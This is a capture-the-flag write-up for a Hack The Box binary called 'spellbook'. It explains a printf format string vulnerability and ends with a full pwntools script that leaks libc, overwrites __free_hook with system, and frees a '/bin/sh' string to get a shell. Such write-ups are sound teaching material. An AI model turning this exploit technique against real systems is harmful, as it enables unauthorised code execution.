The Challenge

For this challenge, we have a binary named spellbook and a libc.so.6. After fuzzing the binary, we realize that it is a storage space that seems to contain 10 available indexes (0-9) to store information about a spell. Since no overflow seems obvious and that the access to the array seems to be safe, I couldn’t find any obvious flaws in the program so I opened it in Ghidra to check what was actually going on. First, we can see in the built-in types the definition of a struct Spls defined as :

typedef struct Spls spl;

struct Spls {
    char type[24];
    char * sp;
    int power;
    undefined field3_0x24; // Padding for alignement
    undefined field4_0x25; // Padding for alignement
    undefined field5_0x26; // Padding for alignement
    undefined field6_0x27; // Padding for alignement
};

Then, we notice a very interesting function called show that we can call from the menu. Here is its decompiled code :

void    show(void)
{
  long lVar1;
  ulong uVar2;
  long in_FS_OFFSET;
  size_t idx;
  
  lVar1 = *(long *)(in_FS_OFFSET + 0x28);
  printf(&DAT_001017d8);
  uVar2 = read_num();
  if ((uVar2 < 10) && (table[uVar2] != (spl *)0x0)) {
    printf(&DAT_001019a8);
    printf(table[uVar2]->type);
    printf(&DAT_001019c6);
    printf(table[uVar2]->sp);
  }
  else {
    printf(&DAT_00101800,&DAT_001017f7,&DAT_00101198);
  }
  if (lVar1 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return;
}

This is a simple function that displays an entry from the spl table. This function is using the printf function to do so, with some calls on data controlled by us. That allows us to use our data with a custom printf format string so that we can read/write data and eventually redirect the execution flow to get a shell.

Disclaimer : The value of the flag is HTB{f45tb1n_c0rrupt10n_0n_p4g3_gl1bc_2.23} which means that the author of the challenge probably wanted us to use some heap exploitation technique to get the flag. However, after seeing it, I didn’t really looked for another code vulnerability and completely missed the heap exploitation possibilities.

I’ll come back to why later but another interesting function from the binary is the delete function :

void delete(void)
{
  long lVar1;
  spl *__ptr;
  ulong uVar2;
  long in_FS_OFFSET;
  size_t idx;
  spl *ptr;
  
  lVar1 = *(long *)(in_FS_OFFSET + 0x28);
  printf(&DAT_001017d8);
  uVar2 = read_num();
  if ((uVar2 < 10) && (table[uVar2] != (spl *)0x0)) {
    __ptr = table[uVar2];
    free(__ptr->sp);
    free(__ptr);
    printf(&DAT_00101978,&DAT_001018d0,&DAT_00101198);
  }
  else {
    printf(&DAT_00101800,&DAT_001017f7,&DAT_00101198);
  }
  if (lVar1 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return;
}

As we can see there, we can call the free function on any entry we want, which means that we can control the argument that we give it when it frees __ptr->sp.

The exploit

What is a format string vulnerability ?

A format string vulnerability is a vulnerability which consists in sending printf formatting characters that will be interpreted as such by printf. The interesting formatters are %s, %p and %n. Even though a printing function like printf might seem harmless, those three formatters combined with minimum field width and positional arguments will allow us to control the execution of the binary. The first thing to understand is how arguments are passed to function in assembly language. The first six arguments respectively go in rdi, rsi, rdx, rcx, r8, r9. If a function needs more than six arguments, the other ones are passed on the stack (like in x86 32 bits). For long format strings that uses several times the same argument, printf implemented what is called positional arguments. It means that the following formatter %n$x will display the nth argument of printf as an hexadecimal number. Since arguments over 6 are supposed to be on the stack, it means that using %7$p will display the first element of the stack as a pointer. If this element is an actual pointer, %7$s will show us what is inside that address (until it reaches a '\0').

The last and most critical useful formatter is %n. %n takes an int * as an argument and will write the number of character printf already write when it reaches that formatter at this address. It means that using the minimum field width, we can print a specified number of characters to control the output of %n and write anything we want wherever we want (Note: even though, this is an int * that will write a 32 bits value, we can use the hh or h modifiers to only write 16 or 8 bits). If you didn’t get that part, you should definitely read printf’s man.

And in our case ?

In this challenge, the string we display is located inside the heap which means that we have absolutely no control over the stack (for the moment). Let’s open gdb and take a look at what the stack frame looks like when we call printf.

gdb

There are 3 interesting values on that frame :

  • the 3rd one : It is a pointer on the main return address, which is located one byte before a libc pointer
  • the 8th one : It is a pointer to __libc_start_main+240 which will help us leak the libc’s address to defeat ASLR
  • the 10th one : It is a pointer on a stack pointer, which means that we can use it as an argument to write the address we want to control on the stack and then use this address to arbitrarily write where we want

Once we have everything we need to exploit this binary, here is how we will proceed: we will try to rewrite __free_hook’s address to take control os the execution flow. __free_hook is global variable containing a function pointer called when free is called. It is set to NULL by default but by controlling it, we can control the execution when we call free. In the delete function, we have a free(__ptr->sp);. If we set __free_hook’s value to system’s address and that we free a spell having /bin/sh as a value, it will execute system("/bin/sh"). Since we cannot write an infinite number of character using printf, we will write system’s address in three times, using two bytes chunks of this address.

  1. use %13$p to leak __libc_start_main+240’s address so that we can find out where the libc is mapped in memory
  2. use %8$p to leak the pointer on main’s return address so that, by adding eight to it, we have a pointer on libc (it will allow us to just take care of the low bytes since the high ones already have the right value)
  3. By writing using %15$n to the stack pointer, we will modify our 41th argument and make it point on the libc’s address we want to modify. We can then use %41$n to set this pointer to __free_hook’s address.
  4. In a loop, compute the 16 bits we want to write on __free_hook’s address and then use %13$n to write them. Then use $41$n to update the value of __free_hook’s address so that we can write the two next bytes of the address.
  5. Now that we have __free_hook pointing on system, we just have to create a spell having "/bin/sh" in spl->sp and then delete it to get a shell.

Here is the script I made to get the flag :

#!/usr/bin/env python3

from pwn import *
import re

binname = './spellbook'
libname = './glibc/libc.so.6'

context.binary = binname
binary = ELF(binname)
libc = ELF(libname)

def add_spell(io, entry, payload):
    if len(payload) > 1000:
        print("payload won't fit in the buffer")
    io.recvuntil(b'>> ')
    io.sendline(b'1')
    io.recvuntil(b': ')
    io.sendline(str(entry).encode())
    io.recvuntil(b': ')
    io.sendline(b'123')
    io.recvuntil(b': ')
    io.sendline(b'1000')
    io.recvuntil(b': ')
    io.sendline(payload)

def read_spell(io, entry):
    io.recvuntil(b'>> ')
    io.sendline(b'2')
    io.recvuntil(b': ')
    io.sendline(str(entry).encode())
    io.recvuntil(b': ')
    io.recvuntil(b': ')
    return io.recvline().strip()

def get_spell(io, entry, payload):
    add_spell(io, entry, payload)
    return read_spell(io, entry)

def delete_spell(io, entry):
    io.recvuntil(b'>> ')
    io.sendline(b'4')
    io.recvuntil(b': ')
    io.sendline(str(entry).encode())

def get_low_bytes(addr):
    return addr & 0xffffffff

io = process(binname)
# io = remote('161.35.173.232', 31962)

libc_main_leak = int(get_spell(io, 0, b'%13$p'), 16) - 240
libc.address = libc_main_leak - libc.symbols.__libc_start_main
print('libc leak:', hex(libc_main_leak + 240))
print('libc base:', hex(libc.address))

ret_addr = int(get_spell(io, 1, b'%8$p'), 16)
lolo_libc_start_main_address = (ret_addr + 8) & 0xffff
print('ret addr  :', hex(ret_addr))

free_hook = libc.symbols.__free_hook
print('free hook:', hex(free_hook))

lolo_free_hook = free_hook & 0xffff
hilo_free_hook = (free_hook & 0xffff0000) >> 16
payload = f'%{lolo_libc_start_main_address + 2}x%15$hn'.encode()
get_spell(io, 2, payload)
payload = f'%{hilo_free_hook}x%41$hn'.encode()
get_spell(io, 3, payload)

payload = f'%{lolo_libc_start_main_address}x%15$hn'.encode()
get_spell(io, 4, payload)
payload = f'%{lolo_free_hook}x%41$hn'.encode()
get_spell(io, 5, payload)

print('leak addr:', hex(int(get_spell(io, 6, b'%13$p'), 16)))

for i in range(7):
    delete_spell(io, 7)

system_addr = libc.symbols.system
entry = 0
mask = 0
for i in range(3):
    mask <<= 16
    mask |= 0xffff
    system_sub_addr = (system_addr & mask) >> (i * 16)
    payload = f'%{system_sub_addr}x%13$hn'.encode()
    get_spell(io, entry, payload)
    payload = f'%{lolo_free_hook + ((i + 1) * 2)}x%41$hn'.encode()
    get_spell(io, entry + 1, payload)
    entry += 2

add_spell(io, 8, b'/bin/sh')
delete_spell(io, 8)

io.interactive()
io.close()

getflag